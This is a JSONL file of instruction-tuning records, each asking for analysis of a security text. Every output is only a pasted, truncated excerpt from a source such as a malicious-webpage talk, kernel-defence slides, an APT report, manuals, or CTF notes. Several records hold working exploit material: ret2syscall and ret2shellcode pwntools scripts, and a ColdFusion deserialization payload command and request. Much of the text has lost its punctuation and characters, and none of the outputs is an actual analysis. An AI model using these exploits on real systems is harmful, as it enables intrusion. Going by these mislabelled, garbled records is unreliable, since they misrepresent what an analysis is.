{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJeremy Chiu, Lead Security Researcher, XSolve Lab Armorize Technologies 20070721 Prefix 由於近日惡意網頁的問題頻傳讓駭客利用惡意程式大量 入侵造成了許多政府機關及各企業的機密資料外洩等資 安問題 為了對抗惡意網頁及伴隨而來的網路犯罪問題今年阿碼 科技公司的艾克索夫實驗室研究團隊特別企劃了一個研究 計畫針對了台灣區網站進行大規模資安檢測對於現階 段的惡意網站問題與惡意程式掛馬兩大部分進行研究在 這個報告中將對於植入的技術與惡意程式做深入的技術分 析活生生的內容讓您了解目前台灣區的各機關與公司 網站被入侵現況 Taiwan Malicious Webpage and Spyware Hacking 2 About me Jeremy Chiu Jeremy Chiu (Birdman) BTW, I got a new job!  阿碼科技公司  XSolve實驗室首席資安研究員 Lead Security Researcher, XSolve Lab, Armorize Technologies Taiwan Malicious Webpage and Spyware Hacking 3 Outline New Threat ! Webbased Malware What is Malicious Webpage? The Last Malicious Webpage Report in Taiwan Cyber Criminal Groups Are Working Analysis of Malicious Webpage Spyware Hacking Automatic Webbased Malware Analysis System HIT2007 - Taiwan Malicious Webpage and Spyware Hacking 4 New Threat ! Webbased Malware 資安的新挑戰  Web Security 大家都知道Web 2.0是炒熱了新一波的網路熱潮但是 很快的我相信就有Web 2.0 SP1了 Webbased Malware 根據最近的各家的研究報告指出目前Malware與Web Security已經狼狽為奸的關係 Google研究中指出 1/10的網站是惡意的而且在1200萬 的惡意網頁中其中100萬的網頁會有下載惡意程式的 行為 Google研究中每2千頁左右的網頁就會有一個是會植 入惡意程式的 Taiwan Malicious Webpage and Spyware Hacking 5 HIT2007 - Taiwan Malicious Webpage and Spyware Hacking 6 Location of compromised web sites Location of malware distribution servers The majority of malware activity seems to happen in China, the U.S., Germany and Russia Reference: Introducing Google's online security efforts 200704 司法院慘遭染指 Taiwan Malicious Webpage and Spyware Hacking 7 2007.04.18 What is Malicious Webpage? Malicious Webpage 網頁被Hacker竄改放內惡意程式碼或是惡意連結導 致瀏覽網頁的使用遭受影響其主要目的在於大量植入 Spyware竊取資料以及盜取密碼 惡意的程式碼 網頁上的惡意Script  Malscript 攻擊使用者環境的程式碼  Exploit 惡意連結  Malink (Maliframe) 為甚麼網頁會被竄改 Web Application Security 通常是網站以被入侵以SQLInjection問題居多 Taiwan Malicious Webpage and Spyware Hacking 8 9 Hacker成本低廉~ 駭客教學雜誌教學動畫滿天飛 只要看過 黑XX雜誌1個月內速成駭客 網路上充斥著各式各樣的便宜駭客工具 各種駭客用的免殺後門程式變形工具 各種ZeroDay Exploit產生器 只要有心人人都是駭客 只要有心人人都是駭客 常用的掛馬Exploit 主要針對微軟環境為主 MS07-017  MS Windows Animated Cursor (.ANI) Remote Exploit MS07-00", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 迷宫问题概述 迷宫问题有以下特点: * 在内存中布置一张\"地图\" * 将用户输入限制在少数几个字符范围内. * 一般只有一个迷宫入口和一个迷宫出口 布置的地图可以由可显字符(比如`#`和`*`)组合而成(这非常明显, 查看字符串基本就知道这是个迷宫题了.), 也可以单纯用不可显的十六进制值进行表示. 可以将地图直接组成一条非常长的字符串, 或是一行一行分开布置. 如果是一行一行分开布置的话, 因为迷宫一般都会比较大, 所以用于按行(注意, 布置并非按顺序布置, 每行都对应一个具体的行号, 你需要确定行号才能还原迷宫地图)布置迷宫的函数会明显重复多次. 而被限制的字符通常会是一些方便记忆的组合(不是也没办法), 比如`w/s/a/d`, `h/j/k/l`, `l/r/u/d`这样的类似组合. 当然各个键具体的操作需要经过分析判断(像那种只用一条字符串表示迷宫的, 就可以用`t`键表示向右移动`12`个字符这样). 对于二维的地图, 一般作者都会设置一个`X坐标`和一个`Y坐标`用于保存当前位置. 我们也可以根据这个特点来入手分析. 一般情况下, 迷宫是只有1个入口和1个出口, 像入口在最左上角`(0, 0)`位置, 而出口在最右下角`(max_X, max_Y)`处. 但也有可能是出口在迷宫的正中心, 用一个`Y`字符表示等等. 解答迷宫题的条件也是需要根据具体情况判断的. 当然迷宫的走法可能不止1条, 也有情况是有多条走法, 但是要求某一个走法比如说代价最小. 那么这就可以变相为一个算法问题.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nl i n u x 内 核 漏 洞 检 测 与 防 御 蒋浩天/张海全 腾讯安全云鼎实验室 自我介绍 蒋浩天 擅长二进制安全虚拟化安全游戏安全等喜欢研究一些底层方向将安全能力下沉开启安 全对抗的上帝模式 张海全 主要从事GCC和Linux内核安全功能研发Linux内核源码贡献者 主要方向是漏洞挖掘CFI防 御编译器sanitizer致力于将漏洞扼杀在编译器中 l 漏洞攻防现状 l 漏洞利用技术 l 传统漏洞防御技巧 l 基于intel pt的漏洞检测方案 l 基于编译器的漏洞防御方案 l 后续展望 大纲 漏洞攻防现状 主机漏洞防御价值  系统漏洞可通杀是云主机最主 要威胁  挖矿/勒索等入侵的必争之地有 爆发态势  内核处在纵深体系中间漏洞多 于固件/虚拟化影响大于基础软 件/用户应用收益大  建设最后一道防线是第一优先 内核漏洞利用现状  内核漏洞攻防现状  内核版本碎片化和支持断供关键系 统难更新  利益驱动的漏洞研究暗流涌动  现有防御选项  开源方案关注事后阻断即时阻断弱 已有对抗 响应难 即时 碎片化 严重 攻击面 庞杂 挖洞降 门槛 攻防升 级  VEDPaloAlto XDR  事中阻断信息少  LKRG  事后阻断  PaX&GrSecurity  重开销价值运营  内核隔离随机化  可绕过 底层 特性 原生 加固 商业 方案 开源 机制 漏洞利用技术 常用的漏洞利用手法  返回地址劫持  堆喷  she链覆盖  栈交换  ROP  Ret2user  等等等 堆喷  内核堆喷是当前内核漏洞利 用过程中非常重要的部分80% 的漏洞利用都依赖堆喷  堆喷利用手法  use after free/double free 类型堆喷利用手法  堆溢出类型堆喷利用手法 传统漏洞防御技巧 堆喷干扰  通过hook接管linux内核slab slub对申请的内存尾部追加少 量随机字节并增加随机延迟释 放可以有效的干扰堆喷导致 其失败从而做到机制性的防御 具备更强的通用性 堆喷干扰  在漏洞利用过程中只要是 利用堆喷的都可以对其进行干 扰导致堆喷失败 ROP防御  ROP在现代漏洞利用中基本是必不可缺的一个环节基本走到这一步说明漏洞利用已经成功了 一大半了已经进行了控制流的劫持漏洞通过rop来调用敏感api来完成权限提升容器逃逸  对提权容器逃逸相关的敏感api进行HOOK  检测栈指针的合法性  调用来源的合法性  调用指令合法性 信息泄露缓解  全局变量地址泄漏  干扰堆喷  dmesg 异常栈指针泄漏  符号地址鉴权脱敏  kallsyms泄漏  符号地址鉴权脱敏 安全状态监控  对系统中所有的进程进行监控监控进程的cred和namespace及时发现进程的异常权限提升和容 器逃逸行为  CR4 SMEP & SMAP状态监测及时发现漏洞利用过程中对SMEP & SMAP的禁用  传统的内核加固方式很多不一一列举 基于intel PT的漏洞检测方案 基于硬件特性的漏洞检测方案  随着时代的发展CPU 支持的硬件特性越来越多安全相关的大家听的最多的就是影子栈并且在 一些场景下已经得到应用  基于软件的漏洞防御CFI/CFG在 Windows 中已经得到广泛应用  CET IBTindirect branch tracker机制基于硬件的简化版本CFI但是很多CPU并不支持  其实Linux kernel 目前对这些安全机制都不支持  我们想对老版本系统进行改造实现这三个特性并且无需重新编译内核 可行性分析  想要实现这些特性我们需要具备一些前置条件  Shadow stack   获取指令流从中提取出 call 和 ret 两种指令  模拟一个栈去模拟 call 和 ret 的入栈出栈操作识别入栈和出栈不对等的情况  IBT/CFI  捕获所有的跳转指令获取指令跳转信息  分析跳转指令的合法性  如何提取指令序列?  如何确定跳转指令的合法性 技术选型  在x86 intel 架构上想要获取程序的 call ret 和间接跳转的指令在不修改源码的情况下有几种 方式  LBR (Last branch record)将跳转分支信息保存到MSR寄存器中记录数量有限可以通过技 巧做到实时拦截  BTS (Branch Trace Messages)可以将跳转分支记录到内存中保存数量多性能低可以通 过技巧做到实时拦截  PT (Processor Trace)属于BTS的进化版本性能更好但无法通过技巧进行实时拦截  通过对三种机制的分析最终选择采用PT技术 技术选型  通过查阅资料我们发现linux perf工具已经集成了intel PT的能力用于做性能分析  分为user模块和kernel模块  Kernel模块负责完成inte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor Recar https://github.com/Ciyfly ksubdomain浅析 ksubdomain是一款基于无状态的子域名爆破工具类似无状态端口扫描支持在Windows/Linux/Mac上 进行快速的DNS爆破拥有重发机制不用担心漏包 ksubdomain的作者是 w8ay ksubdomain 地址 https://github.com/boy-hack/ksubdomain ksubdomain的介绍 https://paper.seebug.org/1325/ 主要是使用无状态的概念 直接使用网卡发包而不是通过socket去操作 对于子域名枚举来说 只发一个udp包等等dns服务器的应答 ksubdomain使用pcap发包和接收数据会直接将数据包发送至网卡不经过系统 通过设计了一个状态表 来控制这个udp的丢包和状态 文章目录 ksubdomain浅析 文章目录 简易流程图 代码目录 cmd core runner test cmd enumCommand runner runner.New 获取pcap版本信息 获取网卡信息并写到yaml文件中 创建内存简易数据库 runner.loadTargets 获取发包总数 core.IsWildCard(domain) 泛解析检测 RunEnumeration 接收协程 runner.recvChanel 发送协程 runner.sendCycle send 发送dns包 处理结果并输出 runner.handleResult runner.PrintStatus 任务情况输出 通过定时器和状态表阻塞主进程 重试 runner.retry Close verifyCommand 验证功能 testCommand 测试功能 计算发包速率 runner.TestSpeed 总结 简易流程图 代码目录 cmd 包含对命令行的支持 并且拆开了 主程序 enum test verify 的命令到不同的go文件 cmd  cmd.go  enum.go  test.go  verify.go core 主要的核心逻辑代码等包含 日志 配置文件 banner 是代码的主体 core/  banner.go  conf   config.go  data   subdomain.txt   subnext.txt  device   device.go   struct.go  gologger   gologger.go  options   options.go  struct.go  subdata.go  util.go  wildcard.go runner 是发包接收包 核心代码 runner/  recv.go  result.go  retry.go  runner.go  runner_test.go  send.go  statusdb   db.go  testspeed.go test 就是测试代码了 test/  checkservername  main.go 可以明显看出来代码设计架构等清晰 我们这里按cmd的使用方式来跟进代码 cmd cmd\\cmd.go 使用cli 构建命令行解析 app := &cli.App{ Name: conf.AppName, Version: conf.Version, Usage: conf.Description, Commands: []*cli.Command{ enumCommand, verifyCommand, testCommand, }, } 包含三个子命令行 这个的功能是输出主的help NAME: KSubdomain - 无状态子域名爆破工具 USAGE: ksubdomain [global options] command [command options] [arguments...] VERSION: 1.8.2 COMMANDS: enum, e 枚举域名 verify, v 验证模式 test 测试本地网卡的最大发送速度 help, h Shows a list of commands or help for one command GLOBAL OPTIONS: --help, -h show help (default: false) --version, -v print the version (default: false) enumCommand 枚举功能 cmd\\enum.go 枚举相关的参数 &cli.StringFlag{ Name: \"domain\", Aliases: []string{\"d\"}, Usage: \"爆破的域名\", Requir", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Adobe ColdFusion AMF Deserialization Remote Command Execution (CVE-2017-3066) [中文版本(Chinese version)](README.zh-cn.md) Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995. Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earlier, ColdFusion 10 Update 22 and earlier have a Java deserialization vulnerability in the Apache BlazeDS library. Successful exploitation could lead to arbitrary code execution. 参考链接 - https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html - https://www.exploit-db.com/exploits/43993 - https://github.com/codewhitesec/ColdFusionPwn ## Vulnerable environment Start a Adobe ColdFusion 11 update 3: ``` docker compose up -d ``` After a few minutes wait, visit `http://your-ip:8500/CFIDE/administrator/index.cfm` with password `vulhub`, you can install the Adobe ColdFusion successfully. ## Exploit Generate a POC via [ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn) in the `poc.ser`: ``` java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser ``` Send the request to `http://your-ip:8500/flex2gateway/amf`, which contains the `application/x-amf` Content-Type and POC within the body: ``` POST /flex2gateway/amf HTTP/1.1 Host: your-ip:8500 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-amf Content-Length: 2853 [...poc...] ``` ![](1.png) `/tmp/success` is successfully created: ![](2.png) Get a reverse shell: ![](3.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncu === 用于连接另一个系统主机 ## 补充说明 **cu命令** 用于连接另一个系统主机cu(call up)指令可连接另一台主机并采用类似拨号终端机的接口工作也可执行简易的文件传输作业 ### 语法 ```shell cu [dehnotv][-a<通信端口>][-c<电话号码>][-E<脱离字符>][-I<设置文件>][-l<外围设备代号>] [-s<连线速率>][-x<排错模式>][-z<系统主机>][--help][-nostop][--parity=none][<系统主机>/<电话号码>] ``` ### 选项 ```shell -a<通信端口>或-p<通信端口>或--port<通信端口> 使用指定的通信端口进行连线 -c<电话号码>或--phone<电话号码> 拨打该电话号码 -d 进入排错模式 -e或--parity=even 使用双同位检查 -E<脱离字符>或--escape<脱离字符> 设置脱离字符 -h或--halfduple 使用半双工模式 -I<配置文件>或--config<配置文件> 指定要使用的配置文件 -l<外围设备代号>或--line<外围设备代号> 指定某项外围设备作为连接的设备 -n或--prompt 拨号时等待用户输入电话号码 -o或--parity=odd 使用单同位检查 -s<连线速率>或--speed<连线速率>或--baud<连线速率>或-<连线速率> 设置连线的速率单位以鲍率计算 -t或--maper 把CR字符置换成LF+CR字符 -v或--version 显示版本信息 -x<排错模式>或--debug<排错模式> 使用排错模式 -z<系统主机>或--system<系统主机> 连接该系统主机 --help 在线帮助 --nostop 关闭Xon/Xoff软件流量控制 --parity=none 不使用同位检查 ``` ### 实例 与远程主机连接 ```shell cu -c 0102377765 cu -s 38400 9=12015551234 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1991, 1992, 1993, 1995, 1998, 1999, 2000 Free Software Foundation .\\\" See section COPYING for conditions for redistribution .TH ar 1 \"1999\" \"Free Software Foundation\" \"GNU 开发工具\" .de BP .sp .ti \\-.2i \\(** .. .SH NAME ar \\- 建立修改档案或从档案中抽取成员 .SH 总览 .hy 0 .na .BR ar \" [\\|\" \"-\" \"\\|]\"\\c .I {dmpqrtx}[abcfilNoPsSuvV] \\c [\\|\\c .I membername\\c \\&\\|] \\c [\\|\\c .I count\\c \\&\\|] \\c .I archive\\c \\& \\c .I files\\c \\&.\\|.\\|. .ad b .hy 1 .SH 描述 GNU 组织的 .B ar 程序用于建立修改档案或从档案中抽取成员 一个 .I 档案 是一个包含了很多其它文件的单独的文件 它采用的结构使得可以很容易恢复原来独立的文件 称为档案的 .I 成员  原始文件成员的内容权限时间属性属主和组都 在档案中得到保留在抽取时可以得到恢复 .B ar 程序维护的档案成员可以拥有一定长度的名字具体情况 与你系统上的 .B ar 是怎样配置的有关 为了与其它工具维护的档案格式兼容 有可能对成员名字的长度有严格的限制 如果确实是这样通常要求采用 15 个字符 典型的格式是 a.out或者 16 个字符典型的格式是 coff .B ar 是一个二进制格式的工具因为这一类档案多数都作为 保存公共程序的 .I 库文件 使用 通过指定修饰符`\\|\\c .B s\\c \\|', \\c .B ar\\c \\& 可以 建立 指向 档案中 可重定位 目标 模块 定义的 符号表的 索引, 一旦建立, 在\\c .B ar\\c \\& 更新 其内容时 (通过`\\|\\c .B q\\c \\|' 执行 更新 操作) , 此索引 也会 得到 更新. 有这种 索引的 档案 可以 加速到 库文件的 连接过程, 并且 允许 库中的 例程 相互调用 而无须 考虑 它们 在档案中的 位置. 可以 使用`\\|\\c .B nm \\-s\\c \\|' 或 `\\|\\c .B nm \\-\\-print\\-armap\\c \\|' 列出 这种索引, 如果 档案 没有这类 索引, 可以 使用 另外 一个 称为\\c .B ranlib\\c \\& 的\\c .B ar\\c \\& 程序 增加 这种 索引. .B ar 至少需要两个参数才能运行 一个指明执行的 .I 操作 可能伴随有其它的 .I 修饰符 作用的档案名字 多数 操作 可以 接受 更多的\\c .I 文件\\c \\& 参数, 指明 操作的 详细 文件. .SH 选项 \\c .B ar\\c \\& 允许你 在第一个 命令行 参数中 以任意 顺序 混合 指定 操作码\\c .I p\\c \\& 和修饰符\\c .I mod\\c \\& . 只要你 愿意, 也可以 用破折号 作为 命令行 第一个 参数的 开始. \\c .I p\\c \\& 关键字 指明 要执行的 操作, 只能 指明为 如下 之一: .TP .B d 从档案中\\c .I 删除\\c \\& 模块. 通过\\c .I files\\c \\& 指明 要删除的 模块的 名称; 如果 没有 指出 要删除的 文件 名称, 档案不会 改变 任何 内容. 如果 给出了\\c .B 'v\\c \\|' 修饰符,\\c .B ar\\c \\& 会例出 它删除的 每一个 模块. .TP .B m 用此 操作 在档案中\\c .I 移动\\c \\& 成员. 如果 某个 符号名 在档案的 多个 成员中 有定义, 那么 程序 怎样 连接 档案 文件 得到的 结果 可能是 不同的. 如果 没有为\\c .B m\\c \\& 指定 修饰符, 由\\c .I files\\c \\& 指出的 成员 将移动到 档案的\\c .I 末尾\\c \\& ; 可以 通过 `\\|\\c .B a\\c \\|', `\\|\\c .B b\\c \\|' 或 `\\|\\c .B i\\c \\|' 等修饰符, 指定 成员 移动的 具体 位置. .TP .B p 在标准 输出上 \\c .I 打印\\c \\& 档案中 指定的 成员. 如果 给出了`\\|\\c .B v\\c \\|' 修饰符, 在 打印 成员 内容 之前, 先打印 成员的 名字. 如果没有 指明\\c .I files\\c \\& 参数, 档案中 所有的 成员 都会被 打印 出来. .TP .B q \\c .I 快速 追加\\c \\&", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntftp === 在本机和tftp服务器之间使用TFTP协议传输文件 ## 补充说明 **tftp命令** 用在本机和tftp服务器之间使用TFTP协议传输文件 TFTP是用来下载远程文件的最简单网络协议它其于UDP协议而实现嵌入式linux的tftp开发环境包括两个方面一是linux服务器端的tftp-server支持二是嵌入式目标系统的tftp-client支持因为u-boot本身内置支持tftp-client所以嵌入式目标系统端就不用配置了下面就详细介绍一下linux服务器端tftp-server的配置 ### 语法 ```shell tftp(选项)(参数) ``` ### 选项 ```shell -c指定与tftp服务器连接成功后立即要执行的指令 -m指定文件传输模式可以是ASCII或者Binary -v显示指令详细执行过程 -V显示指令版本信息 ``` ### 参数 主机指定tftp要联机的tftp服务器的ip地址或主机名 ### 实例 **1安装tftp服务器** 需要安装xinetdtftp和tftp-server 3个软件 如果能上网通过yum安装 ```shell yum install xinetd yum install tftp yum install tftp-server ``` 如果不能上网可以直接安装提供的rpm包 ```shell rpm -ivh xinetd-2.3.14-18.fc9.i386.rpm rpm -ivh tftp-0.48-3.fc9.i386.rpm rpm -ivh tftp-server-0.48-3.fc9.i386.rpm ``` **2配置tftp服务器** 修改/etc/xinetd.d/tftp文件将其中的disable=yes改为disable=no主要是设置TFTP服务器的根目录开启服务修改后的文件如下 ```shell service tftp { socket_type =dgram protocol =udp wait =yes user =root server =/usr/sbin/in.tftpd server_args =-s /home/mike/tftpboot -c disable =no per_source =11 cps =100 2 flags =IPv4 } ``` 说明修改项`server_args= -s <path> -c`其中<path>处可以改为你的tftp-server的根目录参数-s指定chroot-c指定了可以创建文件 **3启动tftp服务器并关闭防火墙** ```shell /etc/init.d/iptables stop # 关闭防火墙 sudo /sbin/service xinetd start 或 service xinetd restart /etc/init.d/xinetd start ``` 看到启动[OK]就可以了 4查看tftp服务是否开启 ```shell netstat -a | grep tftp ``` 显示结果为`udp 0 0 *:tftp *:*`表明服务已经开启就表明tftp配置成功了 **5tftp使用** 复制一个文件到tftp服务器目录然后在主机启动tftp软件进行简单测试 ```shell tftp 192.168.1.2 tftp>get <download file> tftp>put <upload file> tftp>q ``` **6tftp命令用法如下** ```shell tftp your-ip-address ``` 进入TFTP操作 * connect连接到远程tftp服务器 * mode文件传输模式 * put上传文件 * get下载文件 * quit退出 * verbose显示详细的处理信息 * tarce显示包路径 * status显示当前状态信息 * binary二进制传输模式 * asciiascii 传送模式 * rexmt设置包传输的超时时间 * timeout设置重传的超时时间 * help帮助信息 * ? 帮助信息 **7如果老是出现AVC Denial, click icon to view的错误并不能传输文件需要作如下修改** 修改`/etc/sysconfig/selinux`,将SELINUX设定为disable使用命令`setenforce 0`让selinux配置文件生效 **8Busybox中tftp命令的用法** 命令格式为 ```shell tftp [option] ... host [port] ``` 如果要下载或上传文件的话是一定要用这些option的 ```shell -g 表示下载文件 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npwn- ctfwikihttps://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/ ctfwikictfwiki 32 sudo apt-get install lib32z1 lib32ncurses5 unbuntu20lib32z1 1. = EBPRBP - + 48 2. callcallmv ebp+0x8 x86x64 3. 232 1n gdbpwntools socatpwn socat tcp-l:6666,fork exec:../ret2syscall,reuseaddr 6666 py gdb.attach(p) pause() 6666gdbgdbmain breakgets pypayloadgdbc ret2syscall rop https://blog.csdn.net/qq_29343201/article/details/52209588 arg1arg2int 80 execvex864x648 1. gadget 2. pop gadgetpop 3. gadget 4. pop 5.  6. int 80 ropgedget ROPgadget --binary ret2syscall --only \"pop|ret\" | grep \"eax\" ROPgadget --binary ret2syscall --only \"int\" ROPgadget --binary ret2syscall --string \"/bin/sh\" from pwn import * host = '127.0.0.1' port = 6666 #p = process(\"../ret2syscall\") p = connect(host, port) context(log_level = \"debug\", arch = 'x86', os = 'linux') #gdb.attach(p) pause() popeaxaddr = 0x080bb196 pop3argsaddr = 0x0806eb90 int80addr = 0x08049421 shstringaddr = 0x080be408 payload = b'A' * 0x70 + p32(popeaxaddr) +p32(0xB)+ p32(pop3argsaddr)+ p32(0) +p32(0)+p32(shstringaddr)+ p32(int80add r) print(payload) p.recvuntil(\"What do you plan to do?\") p.sendline(payload) p.interactive() ret2shellcode returnprintshellcodeNXdisable from pwn import * host = '127.0.0.1' port = 1111 #p = process(\"../pwn_2\") p = connect(host, port) context(arch = 'amd64', os = 'linux') shellcode = asm(shellcraft.sh()) p.recvline() buffaddr = p.recvline() buffaddr = buffaddr[14:28] buffaddr = int(buffaddr,16) retaddr = buffaddr + 0x18 + 0x08 payload = b'A' * 0x18 + p64(retaddr) + shellcode p.recvuntil(\"Input someting : \\n\") p.sendline(payload) p.interactive() ret2libc pltgot https://cloud.tencent.com/developer/article/1590167?from=article.detail.1680494 ctfwiki ret2libc1 securemainsecuresystemsystem.plt plt.data/bin/sh ret2libc2 /bin/shgets.pltsystem.pltgets bssbsssystem.plt ret2libc3 libcsystem.gotsystemlibc /bin/sh libcGOTlibcgot libclibcGOT #!/usr/bin/env python from pwn import * from LibcSearcher import L", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExport Controls on Intrusion Software Collin Anderson (@CDA) Tom Cross (@_decius_) Do Export Controls on Intrusion Software Threaten Security Research? Truth is we dont know. (Were not lawyers and this isnt legal advice.) Truth is the Government doesnt know. (At least they are asking questions.) Truth is nobody knows. (We dont even agree about this...) Outline: 1. Some Basics a. What is the problem? b. How do export controls work generally? 2. How these new Wassenaar rules work a. IP Network Surveillance Systems b. Intrusion Software c. Technology for the development of Intrusion Software 3. Implications a. Could these rules regulate full disclosure and open source? b. Do these rules apply to Vulnerability Research? c. Could these rules regulate coordinated disclosure or bug bounties? d. Could these rules regulate training classes? e. What if I leave pen testing tools on my laptop when I travel? f. What about foreign coworkers or my companys offices in other countries? g. What about reverse engineering tools? Debuggers? Exploit generators? Jailbreakers? h. If I ask BIS for permission, will I get a license? 4. What can we do about it? The Basics Surveillance is Big Business! Whats the problem? The Problem: 1. The Citizen Lab correctly identified 21 customers of Hacking Team. 2. The US DEA and US Army are customers. DEA are using the technology out of their embassy in Bogota, Colombia. 3. Hacking Team sold its technology to three agencies in Morocco. The Moroccan government's intimidation of civil society is nothing more than an attempt to silence legitimate criticism. 4. Hacking Team have been evading the legitimate questions from UN investigators regarding the sale of technology to Sudan. 5. NICE Systems appears to have sold Hacking Team spyware to Azerbaijan, Uzbekistan, and Denmark. 6. Hacking Team are trying to secure a sale to the Rapid Action Battalion (RAB), a Bangladesh police unit described by Human Rights Watch as a death squad involved in torture and extra", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWinnti is Coming - Evolution after Prosecution TeamT5 2 研究員 UCCU 成員 工程師 Peter Syu 001 Twice 推廣社 社長 工程師 Tom Lai 456 研究員 Aragorn Tseng 首席分析師 Charles Li Who we are AGENDA 01 02 03 04 05 Initial Access Cobalt Strike Loader APT41s Backdoor C2 Hiding Technique Relation to other operations 06 Takeaway Who is Winnti? 4 Winnti? APT41? 5 Ministry of State Security of the People's Republic of China(MSS)  Winnti = APT41 ?  APT41 = Chengdu404 ?  Under APT41, it can be divided into several groups via different techniques and targets  The targets are very wide. It is suspected that MSS has integrated the resources, attack techniques, and tools to make this group looks bigger. APT41 APT10 APT17 APT Integration? Fishmaster /TAG-22 GroupCC Amoeba Unknown Group  Target Country Talk in last section 6 Target Industry High-tech Healthcare Airlines Financial Research Government Media Gaming Telecom Energy Education Manufacturing 7 Compromise Winnti is Coming - Evolution after Prosecution Initial Access  CVE-2021-34527(printnightmare)  CVE-2021-26855(proxylogon)  SQL vulnerabilities  phpmyadmin vulnerabilities  Web vulnerabilities  Flash installer  Fake Decoy Icon 9 Webshell Access 10 Probe plugin 11 Webshell Upload 12 Catalina Log 13 Scan by Shodan Unused Probe 套件, 12, 67% Using Probe 套件, 6, 33% 15 Post-Compromise Winnti is Coming - Evolution after Prosecution New TTPs  Certificate bypass  Dll hollowing technique  InstallUtil  Early bird code injection  CDN service and Cloudflare worker  Some new backdoor 17 Timeline for disseminating the Cobalt Strike 2020.7 2020.11 2021.1 2021.3 2021.4 Chacha20 shellcode or loader(Chatloader) appeared to extract Cobalt strike Beacon Use CDN service in Cobalt Strike, especially DNS beacon Use Cloudflare worker to hide real C2 IP Use certificate bypass and dll hollowing technique in Chatloader Use multiple .NET loaders and misuse InstallUtil to load Cobalt Strike 2021.6 Use funnyswitch to load Cobalt Strike and use early bird code injection technique 18 C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAntivirus Event Analysis Cheat Sheet Version 1.8.1, Florian Roth @cyb3rops! ! Attribute Less Relevant Relevant Highly Relevant Virus Type HTML Iframe Keygen Joke Adware Clickjacking Crypto FakeAV Trojan Backdoor Agent Malware JS Creds PS PowerShell Exploit Ransom PassView Tool-Netcat Tool-Nmap RemAdm NetTool Crypto Scan HackTool HTool HKTL PWCrack SecurityTool Clearlogs PHP/BackDoor ASP/BackDoor JSP/BackDoor Backdoor.PHP Backdoor.ASP Backdoor.JSP Webshell DumpCreds MPreter Koadic Razy CobaltStr COBEACON Cometer Keylogger MeteTool Meterpreter Metasploit PowerSSH Mimikatz PowerSploit PSWTool PWDump Swrort Rozena Backdoor.Cobalt PShlSpy Packed.Generic.347 IISExchgSpawnCMD Location Temp Internet Files Removable Drive (E:, F:, ) C:\\Temp $Recycle.bin C:\\ProgramData C:\\Users\\Public AppData\\Local\\Temp AppData\\Roaming\\Temp C:\\Windows\\Temp %SystemRoot% (e.g. C:\\Windows) C:\\ \\\\Client\\[A-Z]$ (remote session client drive) \\\\tsclient\\<drive> C:\\PerfLogs \\\\*$ (execution on remote host) Other directories that are writable for Administrators only User Context Standard User Administrative Account Service Account System File Server Email Server Ticket System Workstation Other Server Type Domain Controller Print Server DMZ Server Jump Server Admin Workstation Form / Type Common Archive (ZIP) Not Archived / Extracted, Uncommon Archive (RAR, 7z, encrypted Archive) File Extensions: .ASP .ASPX .BAT .CHM .HTA .JSP .JSPX .LNK .PHP .PS1 .SCF .TXT .VBS .WAR .WSF .WSH .XML .CS .JPG .JPEG .GIF .PNG .DAT Time Regular Work Hours Outside Regular Work Hours Google Search (File Name) Well-known Malware (e.g. mssecsvc.exe) or no result at all APT related file mentioned in report Virustotal (Requires Hash / Sample) Notes > \"Probably harmless\", \"Microsoft software catalogue\" File Size > Less than 16 byte (most likely an empty file, error page etc.) ssdeep > 3:: means file is filled with zeros (likely caused by AV) Comments > Negative user comments Additional Information > Tags > CVE-* Additional Informa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced API Security OAuth 2.0 and Beyond  Second Edition  Prabath Siriwardena Advanced API Security OAuth 2.0 and Beyond Second Edition Prabath Siriwardena Advanced API Security: OAuth 2.0 and Beyond ISBN-13 (pbk): 978-1-4842-2049-8 ISBN-13 (electronic): 978-1-4842-2050-4 https://doi.org/10.1007/978-1-4842-2050-4 Copyright  2020 by Prabath Siriwardena This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, 